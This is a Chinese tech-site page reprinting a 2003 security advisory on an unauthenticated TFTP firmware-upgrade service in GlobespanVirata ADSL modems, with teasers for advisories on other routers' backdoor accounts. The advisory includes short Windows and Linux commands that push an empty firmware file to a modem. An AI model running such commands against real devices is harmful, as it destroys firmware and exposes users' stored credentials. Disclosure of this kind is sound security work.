+设为首页   +添加到收藏夹
首页·栏目 >  软件资讯  |  技术专题  |  编程技术  |  数据库  |  服务器  |  项目方案  |  网站架构  |  应用指南  |  技术教程  |  项目开发
    当前位置:首页 » 服务器技术
开发技术指南» 文章正文
    引言: 信息提供:安全公告(或线索)提供热线:51cto.editor@
 

 

 ·dynalink rta 230 adsl router默认后门帐户漏洞    »显示摘要«
    摘要: 信息提供: 安全公告(或线索)提供热线:51cto.editor@gmail.com 漏洞类别: 默认后门帐户漏洞 攻击类型: 远程攻击 发布日期: 2004-09-03 更新日期: 2004-09-07 受影响系统: dynalink rta 230 adsl router 安全系统: 无 漏......
 ·zoom model 5560 x3 ethernet adsl modem默认后门帐户漏洞    »显示摘要«
    摘要: 信息提供: 安全公告(或线索)提供热线:51cto.editor@gmail.com 漏洞类别: 默认后门帐户漏洞 攻击类型: 远程攻击 发布日期: 2004-07-06 更新日期: 2004-07-12 受影响系统: zoom model 5560 x3 ethernet adsl modem 安全系统: ......


GlobespanVirata ADSL 远程升级服务攻击漏洞

【程序编程相关:Java程序中的多线程(1)

【推荐阅读:java多线程数据库操作

信息提供: 【扩展信息:Java语言的局部类

安全公告(或线索)提供热线:51cto.editor@gmail.com

漏洞类别:

设计错误

攻击类型:

远程进入系统

发布日期:

2003-02-28

更新日期:

2003-03-03

受影响系统:

globespanvirata adsl tftpd

安全系统:

漏洞报告人:

jlwhc (nsfocus@163.com)

漏洞描述:

globespanvirata adsl是一款家用adsl适配器,本身具有路由,防火墙,虚拟拨号等众多功能,支持远程tftp对firmware软体升级.

由于globespanvirata adsl的tftpd不存在安全验证机制,导致任何网络用户可以对adsl适配器非法上传或者下载firmware的内部数据(包括内部敏感信息,比如pppoe帐号).

攻击者可以远程利用tftpd软件对adsl适配器发送请求实现攻击.

win2000下

-------------------------------------

c:\echo > null.rom

tftp -i xxx.xxx.xxx.xxx put null.rom

-------------------------------------

linux下

firewall# echo > null.rom

tftp xxx.xxx.xxx

put null.rom


...   下一页
 ·3com officeconnect remote 812 adsl router web接口验证绕过漏洞    »显示摘要«
    摘要: 信息提供: 安全公告(或线索)提供热线:51cto.editor@gmail.com 漏洞类别: 接口验证绕过漏洞 攻击类型: 远程攻击 发布日期: 2004-05-27 更新日期: 2004-06-02 受影响系统: 3com officeconnect dsl router 812 1.1.9.43com offic......
» 本期热门文章:

©2000-2007 All Rights Reserved. 最佳浏览:1024X768 MSIE